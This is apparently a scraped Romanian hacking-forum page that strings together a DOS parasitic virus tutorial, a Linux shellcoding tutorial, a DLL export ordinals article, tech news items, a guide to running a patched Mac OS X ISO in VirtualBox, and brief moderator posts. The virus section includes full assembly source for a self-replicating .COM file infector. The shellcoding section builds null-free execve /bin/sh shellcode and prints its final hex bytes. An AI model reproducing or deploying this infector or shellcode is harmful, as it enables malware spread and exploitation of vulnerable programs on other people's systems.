Nytro

Parasitic Viruses Author: z3ro model z3ro .the parasitic .com infector org 100h push disclaimer I (and the dmz/gny members/staff) take no responsibility for what you do with the knowledge gain from this article. This is for informational purposes only and i do not encourage criminal behavior. If you have a problem with me writing about this topic and think im am a criminal for doing so id like to point out Article 19 of Universal Declaration of Human Rights which states: "Everyone has the right to freedom of opinion and expression;this right includes freedom to hold opinions without interference and to seek, receive and impart information and ideas through any media and regardless of frontiers." Whats happening this time? 1. Why asm is best for viruses 2. What is a parasitic virus 3. The delta offset and infection 4.fectoid v 1.0 ;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~; Call Asm_is_the_shit Now if you have ever seen the source for a virus you would have probably noticed that is in assembly(90% of the time). Now why would it be in asm? isn't asm uber hard? Well asm is a low level language as it deals directly with the cpu OS and memory very closely. This allows you things you couldn't do with C for example such as calculate a delta offset(more on this later). When using C it is possible to create a basic overwriting virus. But these are lame and probably wouldn't work in this day and age due to protected mode. ret ;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~; Call parasitic Ok so what is a parasitic virus. It is quite different from an overwriting virus as it does not damage the host program. There are two main methods to doing this. We must first place a jump at the start of our host to our virus. WE must then calculate the offset to the end of the host and place our virus there. WE must also make sure that we do return control back to the host, or else we risk suspicion and errors. There are two main methods to writing a parasitic virus(DOS0 we could append to the front of the code or at the end. The front tends to be a little faster though it is much more complicated. Te second method is to append at the end and that is what we are going to cover here. retn ;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~; Call infect Ok so you heard all the theory time for some code . When writing a parasitic virus you first need to calculate the delta offset. this is very easy to do but it is also a very important step first: call next next: pop di sub di,offset next Now we have the offset that points to our code. Another very important part of a virus is the find mechanism. This is also very easy as all we have to do is use the 4eh function as interrupt 21h. masker db "*.com",0 lea dx,[bp+offset masker] mov ah,4eh ect... ok so we have found our unwilling host. But how do we know if we havent infected him already? We simply read the first few bytes and compare them to a string(which usually consists of a jmp to our code). mov ax,3d02h lea dx,[bp+offset dta+30] mov cx,3 int 21h xchg ax,bx int 21h mov ax,word ptr [bp+dta+26] mov cx,word ptr [bp+ID+1] ID db "lalala",0 And now the moment you have all been waiting for INFECTION!!!! Which is infact extremely simple. We first must set up the jmp to our code and then or id string then write them to the front of the host. WE do however have to use function 4200h which is straight forward. mov ah,40h mov cx,3 lea dx,[bp+jmpz+ID] int 21h jmpz db 0e9h ; jmp to start of virus code ID db 20h,20h,0 we then reset the file ptr and write the rest. mov ah,40h mov cx,eov-offset start_virus lea dx,[bp+offset start_virus] int 21h We have jsut gone through the basic methods to a parasitic virus. WE have only discussed how to infect a .com file. In the next article we will cover DOs .EXEs and a little PE(i still cant infect them properly ) file infection. ret ;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~; push v1.0 call fectoid Alright well i threw togeather some basic code togeather some code for this article. It IS VERY basic. It only covers what we have discussed in this article. Now it is very poorly done tbh but i feel its very easy to learn from. keep in mind i only spent about 20min working on it, but you can laugh if you want. Id also like to point out that none of these viruses will work on windoze. The techniques are similar but now you cant simply overwrite a file and get away with it. Learning how to do this is the first step. Sooner or later ill get into PE infetion which is MUCH MUCH more complicated. Anyways i hope you enjoy ill post a better version sometime soon, an infection checking system that actually works and better coding in general. Enjoy. .model small org 100h .code .startup Vic db "*.com",0 dta db 42 dup (?) junk db 41h,41h,0 leap db 0e9h,41h,0 _fect db ? ; here we set up offsets and the like start: db 0e9h dw 0 do:call next next: pop di sub di,offset next lea si,[bp+offset junk] mov di,100h push di movsw movsb mov _fect,5 ;up to 5 infections per run ;set up dta to match our delta or else bad things will happen.... lea dx,[bp+offset dta] call DTA_set find_first: mov ah,4eh lea dx,[bp+offset vic] int 21h call ok find_next: mov ah,4fh int 21h call ok jc quit jmp find_next ; here we make sure the file is a .com file and check for previsious infections ok: mov ax,3fh lea dx,[bp+offset dta+30] mov cx,3 int 21h xchg ax,bx int 21h mov ax,word ptr [bp+dta+26] mov cx,word ptr [bp+junk+1] add cx,eov-do+3 cmp ax,cx sub ax,3 mov word ptr [bp+buff],ax xor al,al call file_ mov ah,40h mov cx,3 lea dx,[bp+leap] int 21h mov al,2 call file_ mov ah,40h mov cx,eov-do lea dx,[bp+do] int 21h close: mov ah,3eh int 21h dec _fect cmp _fect,0 jnz find_next jmp host host: mov dx,80h int 21h mov di,100h jmp di quit: mov ax,4c00h int 21h ; sets the dta duh... dta_set: mov ah,1ah int 21h retn ; this sets up and returns our file pointer file_: mov ah,42h xor cx,cx xor dx,dx int 21h eov equ $ buff dw ? END

Shellcoding with Direct Stack Usage - h0yt3r ###SHELLCODING WITH DIRECT STACK USAGE### ~by h0yt3r Hai This is an example of how to produce nullbyteless shellcode out of a simple assembler code with two methods of stackusage. I will start with an example which shows how to execute a bourne shell in assembler (nasm): ------------bla.asm section .data binsh db '/bin/sh',0 ;save '/bin/sh' string at data section section .text global _start _start: mov eax,11 ;syscall execve mov ebx,binsh ;move the '/bin/sh' string adress into ebx push 0 ;as the next argument (*const argv[]) is an array push binsh ;we will need to save it on the stack and null-terminate it mov ecx,esp ;then put the first adress of the stack into ecx mov edx,0 ;no *const envp[] int 0x80 ;kernel call ;eof ------------ Okay we will assemble and link this code: h0yt3r@Cain:~/Desktop$ nasm -f elf bla.asm h0yt3r@Cain:~/Desktop$ ld -o bla bla.o h0yt3r@Cain:~/Desktop$ ./bla sh-3.2$ exit exit Works fine. Lets have a look at the objdump. h0yt3r@Cain:~/Desktop$ objdump -D bla bla: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: b8 0b 00 00 00 mov $0xb,%eax 8048085: bb a0 90 04 08 mov $0x80490a0,%ebx 804808a: 68 00 00 00 00 push $0x0 804808f: 68 a0 90 04 08 push $0x80490a0 8048094: 89 e1 mov %esp,%ecx 8048096: ba 00 00 00 00 mov $0x0,%edx 804809b: cd 80 int $0x80 Disassembly of section .data: 080490a0 <binsh>: 80490a0: 2f das 80490a1: 62 69 6e bound %ebp,0x6e(%ecx) 80490a4: 2f das 80490a5: 73 68 jae 804910f <__bss_start+0x67> ... Disassembly of section .comment: 00000000 <.comment>: 0: 00 54 68 65 add %dl,0x65(%eax,%ebp,2) 4: 20 4e 65 and %cl,0x65(%esi) 7: 74 77 je 80 <_start-0x8048000> 9: 69 64 65 20 41 73 73 imul $0x65737341,0x20(%ebp,%eiz,2),%esp 10: 65 11: 6d insl (%dx),%es:(%edi) 12: 62 6c 65 72 bound %ebp,0x72(%ebp,%eiz,2) 16: 20 32 and %dh,(%edx) 18: 2e 30 35 2e 30 31 00 xor %dh,%cs:0x31302e h0yt3r@Cain:~/Desktop$ As we can see, this code needs more than one section for execution. Its is also full of 0-bytes which is kinda evil for later shellcode since 0-bytes are treated as string terminator when it is passed as a parameter for example. A _useful_ asm code _without_ different sections and _without_ 0-bytes for later shellcode using the call technique: ------------bla2.asm section .text global _start _start: jmp short two ;we short jump to two for saving '/bin/sh' on the stack (look at two now) one: pop ebx ;as the return adress is saved on top of the stack and points to '/bin/sh', ;it is just popped from the stack and saved into ebx (char *path) ;ok the adress of '/bin/shX' is saved in ebx now. the X will represet the null terminating byte xor eax,eax ;0-out eax mov byte [ebx + 7],al ;this instruction replaces the X with the value of al ;(count seven bytes up the data to which ebx is pointing to and put a null there) => nullterminate /bin/sh ;this will also only work if the shellcode is saved on the stack (eg when its injected into a ;vulnerable programme since we only have write access there) push eax ;=> push 0 for null termination of '/bin/sh' push eax ;restore ebx at the stack so that the stackpointer points to nullterminated '/bin/sh' mov ecx,esp ;stackpointer into ecx (*const argv[]) mov edx,esp ;same to edx (*const envp[]) ;we could also say 'mov edx,0' but this would just produce another 0-byte mov al,11 ;syscall execve int 0x80 ;make the kernelcall two: call one ;on execution we directly jump here and make a call _upwards_ again. ;_upwards_ is important. a call allows much longer jump distances, so if we make a call downwards ;with a value of 10 for example, the rest of the value would be filled with 0-bytes. ;so when we call upwards, we are passing a negative number as value ;(leading to 0xff...) which will not any contain 0-bytes. db '/bin/shX' ;when making a call, the adress of the next instruction is pushed onto the stack and will be ;treated as return adress. This tells the processor where execution flow has to be continued when function ;'one' is finished. in this case, the return adress will just point to the '/bin/sh' string. ;eof ------------ Lets look at the objdump again h0yt3r@Cain:~/Desktop$ nasm -f elf bla2.asm h0yt3r@Cain:~/Desktop$ ld -o bla2 bla2.o h0yt3r@Cain:~/Desktop$ objdump -d bla2 h0yt3r@Cain:~/Desktop$ objdump -d foo foo: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: eb 10 jmp 8048072 <two> 08048062 <one>: 8048062: 5b pop %ebx 8048063: 31 c0 xor %eax,%eax 8048065: 88 43 07 mov %al,0x7(%ebx) 8048068: 50 push %eax 8048069: 50 push %eax 804806a: 89 e1 mov %esp,%ecx 804806c: 89 e2 mov %esp,%edx 804806e: b0 0b mov $0xb,%al 8048070: cd 80 int $0x80 08048072 <two>: 8048072: e8 eb ff ff ff call 8048062 <one> 8048077: 2f das 8048078: 62 69 6e bound %ebp,0x6e(%ecx) 804807b: 2f das 804807c: 73 68 jae 80480e6 <two+0x74> 804807e: 58 pop %eax h0yt3r@Cain:~/Desktop$ We can see that our code doesn't produce any 0-bytes anymore, so now we could perfectly use it as shellcode. Okay, now an imo more elegant way of code with direct stackusage without calls and jumps: ------------bla3.asm section .text global _start _start: xor eax,eax ;0-out eax push eax ;put 0 onto stack for null-terminating push 0x68732F2F ;put '/bin/sh' onto stack push 0x6E69622F ;actually it is 'hs//nib/' since the string has to be pushed in reversed order. ;we are also using two '/' cos our data needs to stay directly at the 8 byte bound, for not producing 0-bytes mov ebx,esp ;stackpointer (/bin/sh) to ebx (char *path) push eax ; => push 0 push eax ;put ebx onto stack mov ecx,esp ;since ecx needs null-terminated *const argv[] which is same as ebx mov edx,esp ;*const envp[] whatever mov al,11 ;syscall execve int 0x80 ;fire ;eof ------------ Assembling, linking: h0yt3r@Cain:~/Desktop$ nasm -f elf bla3.asm h0yt3r@Cain:~/Desktop$ ld -o bla2 bla3.o h0yt3r@Cain:~/Desktop$ ./bla3 sh-3.2$ exit exit h0yt3r@Cain:~/Desktop$ objdump -d bla3 bla3: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: b0 0b mov $0xb,%al 8048065: 68 2f 2f 73 68 push $0x68732f2f 804806a: 68 2f 62 69 6e push $0x6e69622f 804806f: 89 e3 mov %esp,%ebx 8048071: 52 push %edx 8048072: 53 push %ebx 8048073: 89 e1 mov %esp,%ecx 8048075: 89 e2 mov %esp,%edx 8048077: cd 80 int $0x80 h0yt3r@Cain:~/Desktop$ This looks even better, doesn't it? Now use it! I'll take katharsis' extractor; it's nothing special but kinda useful h0yt3r@Cain:~/Desktop$ perl shellgen.pl bla3 [*] shellcode generator [*] written by katharsis [*] www.katharsis.x2.to [*] nebelfrost23@web.de [^] generating opcode... [^] generating shellcode... [^] formating shellcode [^] done, here you are: \x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x89\xe2\xcd\x80 h0yt3r@Cain:~/Desktop$

A Crash Course In Exporting From A DLL With A Detailed Look At The DEF File Using Visual C++ Professional 6.0 By: George Chastain Date: 7/21/2000 When creating a new DLL, an Import Library (with a ".LIB" extension) is created. This Import Library has to remain consistent with the DLL used to create the library -- at least for the code utilized by the client. Occasionally, you may find yourself delivering multiple products to multiple customers and some of these products may share a particular DLL. But what happens if a customer obtains a new version of one of those products but doesn't obtain new versions of the other products that use that particular DLL? It is possible that the new version of the DLL delivered with the new product could break the other, older product that the customer already has. This can happen if information contained within the new version of the DLL becomes inconsistent with the information recorded for the DLL by the Import Library used to link the other older products. Before describing how to help alleviate some the possibility of this occurring, we will take a brief look at what an Import Library contains. The Import Library The Import Library does not contain any code. It may be thought of as a "road map" to the functions, classes and other declarations provided by the DLL. When linking a client of a DLL, the Linker needs to record the information contained in this "road map" in the client that will use the DLL. That information will allow the client to locate the things provided, or exported, by the DLL. See Figure 1. Figure 1 DLL And Import Library When a client of a DLL references something exported by the DLL, the client utilizes the information obtained by linking with the Import Library to find the item being referenced in the DLL. There is no actual code or resources in the Import Library. All of that is contained in the DLL. The Import Library just tells the client of the DLL where to find the things that the client needs from the DLL. Figure 2 Client Links To Import Library But just how does a client find the stuff provided by the DLL? Names And Numbers When the Linker links a DLL, it assigns to the exported functions, classes or data, unique names and identifying numbers to all the exported items. For C++ functions and classes, the unique names are called Decorated Names. And the unique numbers assigned to the exported items are called Ordinals. Earlier, I mentioned a potential problem in which the Import Library used to link a client can become "inconsistent" with a newer version of the DLL associated with that Import Library. To explain what happens, we will take a look at two examples. I will not go into detail on how to create a DLL using Visual C++. If you do not know how to do this you should review the subject in the MSDN library or any book on Visual C++ programming. The first example we will look at exports in the conventional manner that most developers are familiar with. I have created a DLL project called ExportDemoDLL1. In that project I created a header file called MyFunctions.h. The contents are shown in Figure 3. Figure 3 ExportDemoDLL1 MyFunctions.h Notice that the DLL exports two functions using the "__declspec(dllexport)" directive and a class using the AFX_EXT_CLASS macro. Currently, the AFX_EXT_CLASS macro is simply defined to be AFX_CLASS_EXPORT by the Microsoft header file AFXV_DLL.h if a DLL is being built. The AFX_CLASS_EXPORT, currently, is itself defined to be __declspec(dllexport). If an executable is being built, Microsoft defines the AFX_EXT_CLASS macro as AFX_CLASS_IMPORT which, in turn is declared as "__declspec(dllimport)". You may occasionally see classes written by developers that make use of the AFX_CLASS_EXPORT or __declspec directly. However, you are encouraged to use the proper macro AFX_EXT_CLASS when creating a class to export in case Microsoft changes the way in which class exports must be made in a future version of Visual Studio/Visual C++. You will also notice the use of a preprocessor directive "_EXPORTING". This, together with the use of AFX_EXT_CLASS, makes it easy for you to create a single header file for use by the DLL project to export functions and data and for use by the client project to import the functions and data. This helps eliminate the need to maintain two separate header files. When you build your DLL, specify the preprocessor directive /D "_EXPORTING" in the list of compiler options. Do not do this when building the client and you will be able to use the same header file. When the ExportDemoDLL1.dll is built, the exports are translated into Decorated Names and Ordinal Numbers as shown highlighted in the "Export Function List View" windowpane of Dependency Walker: Figure 4 Export Function List View of Dependency Walker The "Export Function List View" windowpane has two columns of interest to us. The first is labeled "Ordinal". This is the unique Ordinal Number assigned to the exported function. The other column of interest is labeled "Function" and it shows the unique Decorated Name given to the exported function within the DLL. The client makes use of this information when locating the functions. The functions are defined as shown in Table 1. ***Vezi sursa*** Later, I will explain how to obtain the Decorated Names for items you wish to export and how to convert Decorated Names to Undecorated Names. You will notice in Figure 3 above that the class method CMyCLass::SAbout() is implemented within the class declaration. That is, the body is defined in the class declaration instead of within the CPP file for the class. When you fully define a class method within the class declaration, it is normally treated as an inline function. However, when you export an inline function with __declspec(dllexport), the inline function is always instantiated and exported, whether or not any module in the client program references the function. The function is presumed to be imported by another program. When you export an entire class using the AFX_EXT_CLASS macro as illustrated above you are, in effect, exporting the inline function SAbout(). This is why you see the method listed as an exported function in the "Export Function List View" of Dependency Walker in Figure 4 above. Now, assume that we have built a client application that makes use of this ExportDemoDLL1 DLL. Then we decide later to add a new function to the DLL and export it. We will try this and add a function called Sub() as shown in the new version of the header file in Figure 5. Figure 5 New Version of MyFunctions.h We now build the new version of the DLL and take a look at the exports in Dependency Walker: Figure 6 New Version of ExportDemoDLL in Dependency Walker Look at what happened to the exported function Sum(). Its Ordinal Number is now 8 where it was 7 in the previous version of ExportDemo1.DLL. If we do not re-link the client application with the Import Library created when building the new version of the ExportDemoDLL1.DLL the application will be looking for the function Sum() in the wrong location in the DLL!! The results are unpredictable and typically catastrophic. Further, you usually will have no clue as to why the executable crashed! You could spend a lot of time trying to debug this one. Now that we understand the problem, what can we do about it? The answer is to explicitly define Ordinals for the exported functions so that the exported functions will always receive the same ordinals on every release of the DLL. Defining Ordinals -- The DEF Way For the next part of the discussion, we will assume that a new DLL project has been created. I will refer to it as ExportDemoDLL2. When you use the Visual C++ AppWizard to create a new DLL project, the wizard creates a file called the Module Definition File. The file has a ".DEF" extension and contains information similar to that shown in the example in Figure 7. Figure 7 Default DEF File We will be making some additions to the contents of this file. But before we do we need to remove the export directives and macros from the header file MyFunctions.h that was created for our first example, ExportDemoDLL1. The header file for our new example DLL is shown in Figure 8. We haven’t added the function Sub() yet. We will do that shortly. Figure 8 New MyFunctions.h For ExportDemoDLL2 Now that we no longer state that we want the entire class CMyClass exported in the header (because we removed the AFX_EXT_CLASS macro) you must add export directives to the DEF file. The required entries for the DEF file for ExportDemoDLL2 are shown in Figure 9. Again, we will add our function Sub() shortly. Figure 9 New DEF File I have explicitly assigned ordinals to the exported functions. They are shown after the decorated names following the "@" sign. Text appearing to the right of a semi-colon is treated as a comment. The line containing the keyword LIBRARY specifies the internal name of the DLL. The line containing the keyword DESCRIPTION defines a string to be written into an .rdata section of the DLL. This description is different from the text inserted in the library by the Linker’s /COMMENT option. Now we are ready to build the new version of our DLL. But what happens now?! We get an unresolved external symbol error from the Linker! See Figure 10. igure 10 Unresolved External Symbol I mentioned above that because we were exporting an entire class with AFX_EXT_CLASS, the inline methods are always expanded and exported just like any other class method whose implementation is provided in a CPP file. But now we have removed the AFX_EXT_CLASS macro from the class declaration. The inline method CMyClass::SAbout() will now remain treated as an inline function. You cannot export an inline function because there is nothing to export. There are two solutions to this situation. Option 1 We may remove the definition for CMyClass::SAbout() from the header file and place it in the CPP file MyFunctions.cpp. The new header file will then appear as shown in Figure 11. Figure 11 MyFunctions.h Without Method Definition When we do this we can successfully build the DLL and examine it in Dependency Walker. You will notice that the method SAbout() is listed as an exported function in the "Export Function List View" windowpane just as it was before. Figure 12 ExampleDemoDLL2 With Non-Inlined Method Exported Option 2 Or, we may simply remove the export line for the member function SAbout from the DEF file. In this case MyFunctions.h will remain as shown in Figure 8. The DEF file would then appear as shown in Figure 13. And since the header file MyFunctions.h will be included in source code that references the DLL, the method CMyClass::SAbout() will continue to be treated as an inline function. But there is a "gotcha" with this implementation so I recommend that you use the first implementation. I will explain why later when I discuss the pitfalls of using DEF Files. Figure 13 DEF File Without Inlined Class Method But for now, notice that in the "Ordinal" column of the "Export Function List View" windowpane the exported functions are assigned the ordinals I defined in the DEF file. Ordinal numbers may be any number between 1 and 65,535 inclusive. Ordinal numbers 4 and 5 are skipped in the DEF file for the example ExportDemoDLL2 so Dependency Walker displays them with no export entry. As a matter of good practice, you should number your exports sequentially. Now, let us see what happens when we add the function Sub() to this new DLL project like we did in the example ExportDemoDLL1. I modified the header file to appear as shown in Figure 14. Note that I am going with the first option in the implementation of the method CMyClass::SAbout(). Figure 14 New MyFunctions.h With Function Sub() Then, I modified the DEF file as follows: Figure 15 New DEF File With Export Entry For Function Sub() After building the ExportDemoDLL2 again, we can re-examine the DLL using Dependency Walker. Figure 16 ExportDemoDLL2 In Dependency Walker With Function Sub() We now see the export for the function Sub() at the top of the "Export Function List View" windowpane of Dependency Walker with the assigned ordinal of 1. Notice that the ordinals for the other exported functions are unchanged from those shown in Figure 12 above. If I were to now place this new DLL (with the added function Sub()) from the example project ExportDemoDLL2 with an application linked with the Import Library produced by the version of ExportDemoDLL2 created before function Sub() was added, the executable would still run successfully. The newly added function Sub() would simply be ignored by the application. Exporting Global Variables Exporting global variables is just as easy as exporting functions. They will also be listed in the "Export Function List View" windowpane of Dependency Walker along with the functions and class methods that are exported. The only thing to remember is not to define the global in a header file that is included in both the DLL and your client or you will get an error from the Linker that the symbol is multiply | defined. As with the functions, you can export a global variable in two ways. The first method of exporting a global is to add a line to the header file as shown in MyFunctions.h in Figure 17. Then, in a CPP file of your DLL project, define the global variable as you would any global variable. ................................................................................. Sursa (articolul complet): How To Define And Use DLL Export Ordinals

Deci sa banez 85% dintre utilizatorii activi ai forumului?

Google se afiseaza cu noul Chrome OS si notebook-ul aferent de Silviu Anton | 8 decembrie 2010 Asa cum va anuntam si ieri, Google a lansat oficial varianta beta de testare a sistemului de operare Chrome, impreuna cu un nou notebook pe care sa ruleze. Google Chrome OS a fost conceput ca o platforma care sa imbine sistemul de operare de pe calculator cu Internetul: utilizatorul nu mai este nevoie sa ruleze programele direct de pe computer, ci le poate rula online, pe Web. Prin crearea programelor independente, Google se asigura ca toate aplicatiile si fisierele de orice tip vor avea intotdeauna back-up si vor fi disponibile oriunde si oricand, de vreme ce Chrome OS va fi si el disponibil indiferent de locul in care se afla userul. Asadar, posibilitatile sunt nelimitate, cu atat mai mult cu cat exista si Chrome Web Store, care ofera atat aplicatii platite, cat si gratuite. In ceea ce priveste echipamentul hardware pe care va rula initial Chome OS, marturisim ca cei de la Google au reusit sa ne surprinda intr-un mod placut. Notebook-ul Cr-48 are un ecran de 12 inci, tastatura full-size si un clickpad generos. Procesorul este Qualcomm Gobi 3G, iar bateria are o durata de viata de pana la 8 ore. Ceea ce a reusit sa ne straneasca mirarea a fost faptul ca Google a ales sa nu branduiasca notebook-ul cu nicio marca sau logo, impachetandu-l intr-un design total neatragator. Poate ca, cel putin de aceasta data, Google nu a tintit tocmai imaginea si look-ul, concentrandu-se in schimb pe lucruri mai importante de atat. Nu putem decat sa presupunem ca gigantul Internetul a vrut astfel sa ne transmita un mesaj, si anume, ca nu se vrea a fi un competitor pentru dezvoltatorii din zona hardware. O dovada in acest sens ar mai putea reprezenta si faptul ca Google a ales sa nu comercializeze acest laptop, ci sa il distrubuie gratuit printr-un program numit Chrome OS Pilot. Pentru a va inscrie in programul beta, puteti aplica aici. Cum insa numarul de unitati ale acestui laptop este limitat, cel mai probabil va trebui sa asteptati pana la jumatatea anului viitor, cand vor aparea modelele celor de la Samsung si Acer, care cu siguranta vor fi mult mai atragatoare de atat. Sursa: Google se afiseaza cu noul Chrome OS si notebook-ul aferent | Hit.ro

Cele mai puternice procesoare AMD Phenom cu sase si doua nuclee de Laurentiu Crisu | 8 decembrie 2010 AMD a lansat a doua noi modele de procesoare desktop Black Edition, unul dintre ele fiind varful de gama al seriei cu sase nuclee, AMD Phenom II X6. Aceste procesoare se alatura seriei de cipseturi AMD 8, dar si recent lansatei serii de placi grafice ATI Radeon HD 6000, ce ofera o experienta inedita 3D cu performante multimedia accelerate GPU. Procesorul AMD Phenom II X6 1100T este noul varf de gama pentru procesoarele desktop AMD ce ofera functionalitati de top cum ar fi multiplicatori de ceas deblocati, tehnologie Turbo CORE si performante pe sase nuclee. Procesorul AMD Phenom II X2 565 Black Edition este o alternativa accesibila pentru entuziastii in cautare de capabilitati de personalizare a performantelor la viteze incredibile. Cerintele tot mai mari de continut media HD si 3D au creat un nou standard pentru experienta vizuala. Versatilitatea computerelor cu tehnologie VISION creaza posibilitati nelimitate pentru utilizatori, cum ar fi orientarea catre Internet a divertismentului video, crearea de continut foto si video, rularea celor mai pretentioase jocuri PC si imbunatatirea performantelor multi-tasking. Utilizatorii in cautarea unui nou PC ce combina valoarea performantelor multi-core, optiuni multiple ale platformei PC, continut video HD si grafica 3D pot opta pentru un computer cu tehnologie VISION de la AMD. Sursa: Cele mai puternice procesoare AMD Phenom cu sase si doua nuclee | Hit.ro

Internet Explorer 9 introduce instrumentul anti-tracking pe Web de Cristina Enescu | 8 decembrie 2010 Browser-ul Microsoft IE9 va avea instrumente care vor restrictiona colectarea datelor despre activitatea online a utilizatorului, impiedicand astfel ca site-urile vizitate sa impartaseasca informatii despre activitatea acestuia pe Web. Vestea vine pe fondul criticilor adresate de guvernul Statelor Unite industriei de computere, legate de progresul lent in domeniul protejarii confidentialitatii utilizatorului. Intr-o postare pe blog, Microsoft a declarat ca oamenii nu isi dau seama ca atunci cand viziteaza un site, informatiile legate de ceea ce cauta sau cumpara ajung adesea in posesia altor companii, fara ca utilizatorii sa fie instiintati. Odata cu IE9, Microsoft planuieste sa introduca ceea ce numeste “Tracking Protection List”, care, potrivit companiei, se comporta asemeni listei “Do Not Call” ce limiteaza numarul persoanelor care pot fi sunate de firmele de marketing. Utilizatorii vor putea sa creeze liste prin care datele lor vor putea fi impartasite numai pe site-urile alese chiar de ei. Cand va fi pornit, sistemul ar putea impiedica vizualizarea anumitor reclame sau a altor functii in momentul in care utilizatorii viziteaza site-urile respective. Oricine va putea sa scrie o lista si sa o impartaseasca cu altii pentru a avea parte de aceeasi protectie, a declarat Microsoft. Compania planuieste, de asemenea, sa lanseze formatele si standardele pentru liste sub o licenta libera, pentru a putea fi adoptate si de alte browsere. Microsoft a mai adaugat ca primele versiuni ale acestor noi functii vor fi incluse in versiunea IE9, programata pentru lansare la inceputul lui 2011. Sursa: Internet Explorer 9 introduce instrumentul anti-tracking pe Web | Hit.ro

Am observat ca sunt unele probleme in legatura cu mail-ul de activare al unui cont nou creat. Daca v-ati creat un cont si nu ati primit mail-ul de activare, trimiteti-mi un MP si se rezolva. Nu va voi retrimite un email de activare ci va voi activa eu contul.

Nu trebuie sa le citesti pe toate, ar fi absurd, citeste fiecare ce anume il intereseaza.

How to Run Mac OS X in VirtualBox on Windows Author: Bobby Patton Sursa: How to Run Mac OS X in VirtualBox on Windows We've shown you how to install Snow Leopard in VMWare, but if you haven't purchased VMWare, you can now do it using previously mentioned, free program VirtualBox. Apart from VirtualBox, you'll also need an OSX86 ISO. The group Hazard has put out a good patched Snow Leopard installer that should do fine (just search for it on Google). Of course, if you feel bad about downloading the ISO of Snow Leopard, you could always go buy a copy to feel a bit better, karmically. After you have them both, install Virtualbox. Open up Virtualbox and click on New at the top left. At the Create New Virtual Machine window, click Next. At this window type OSX as the name and it will automatically change the system and version. The next window will let you choose your RAM amount: If you can spare it, crank it up as far as you can go, but 1024MB should be sufficient. This is where you'll make your hard disk. 20GB should be enough so what it comes down to is dynamic or static. Dynamic will expand on use and Static will be a fixed 20GB no matter how much data is actually in it. Dynamic is better for not taking up your hard drive but static should give you better performance. I normally use dynamic. Click next unless you want to change it from dynamic or if you want to increase the disk size or file location. It will show a summary of your settings. Click Finish, then click Settings at the top. At this window click on System in the left pane and uncheck Enable EFI. Now click on the Storage button on the left. From there click on Empty under the OSX.vdi, then click the folder with the green arrow on the right (next to "CD/DVD Device"). At this window click the Add button at the top. Then find and add the OSX86 ISO you downloaded earlier. Then highlight it and click Select at the bottom. Then click OK, and hit the Start button on the left side of the main VirtualBox window. As it starts up, click inside the window and hit F8. Then at the boot: prompt type –v so you can see what exactly went wrong if something does go wrong. All the services will run and eventually you should come to the language screen. Choose your language then click next. If you are unable to move your mouse around then hit Right-Ctrl + I. Click Continue and Agree. Next, start up Disk Utility by going to Utilities in the menu bar. At this screen highlight 20GB VBOX HARDDISK. Then click the Erase tab, name it what you want in the name box and click the Erase button on the bottom right of the window. It shouldn't take long. Then click Disk Utility in your menu bar and quit it. Now you're back at the installer. Highlight the drive that is now showing up and click Continue. The next window is important. Click the Customize button on the bottom left. AMD Users check: Any Updates included at the top. Drop down Kernels and choose Legacy kernel. AMD option below System support. Intel Users check: Any Updates included at the top. Drop down bootloaders and check the newest Chameleon. Drop down Kernels and choose Legacy kernel. Then click Done and hit the Install button. To speed up the process you can click Skip when the disc check pops up. As soon as it says "installation finished" and starts counting down to restart, press the right Ctrl key. Click on Devices at the top of the VirtualBox window, hit CD/DVD Devices and click Unmount CD/DVD Device. Then go to Machine > Reset and click Reset at the prompt. Next you'll see the Chameleon loader and then OS X will begin to boot. After it boots you will see the setup screens for OS X! You're good to go. The only hiccup I've found is that it can only be virtualized with one core. It could be the OSX disc I was using or it might not be. And I have yet to find the right kext that will allow audio to work and the resolution is limited also. But other than that you'll have a fully functioning OSX virtualized! Update: I'd like to post some answers to the resolution and audio. I should have looked around before posting this but I just didn't have the time. So anyways heres what you can do: To fix the resolution issue, open Finder and go to the OS X drive on the left. Open the folder called Extras. Right Click on the file com.Apple.Boot.plist and open it with TextEdit. Under the first insert this: Graphics Mode 1280x1024x32 or another compatible resolution. Select "Save As" at the top and save it to the desktop, unchecking the check under Unicode and then save it as com.apple.boot.plist. After that drag and drop it into the extras folder and overwrite the original file, entering your password when prompted. Instructions for the sound issue can be found here. Don't install system updates. If you want updates you'll have to install another iso distribution with the updates on it. If you install the updates directly from apple it messes with the custom kexts and chameleon. Just a forewarning. And for those of you getting boot issues try choosing a different version of Chameleon or a different kernel. Sometimes that seems to help. And If your getting one of the USB errors then try disabling USB in the VirtualBox settings and see if that helps. Tek411: OSX in Virtual Box (Hackintoshed VM)

Mue recaptcha. Orice, numai aia nu.

Vim si Emacs e naspa. Notepad++, Gedit si Kwrite imi plac.

Lumea inca e de parere ca hackerii sunt niste singuratici rupti de lume care lucreaza la subsolul unei case si ca nu au nici o legatura cu lumea exterioara, trist.

Ban amandoi 2 zile, sa va mai calmati.

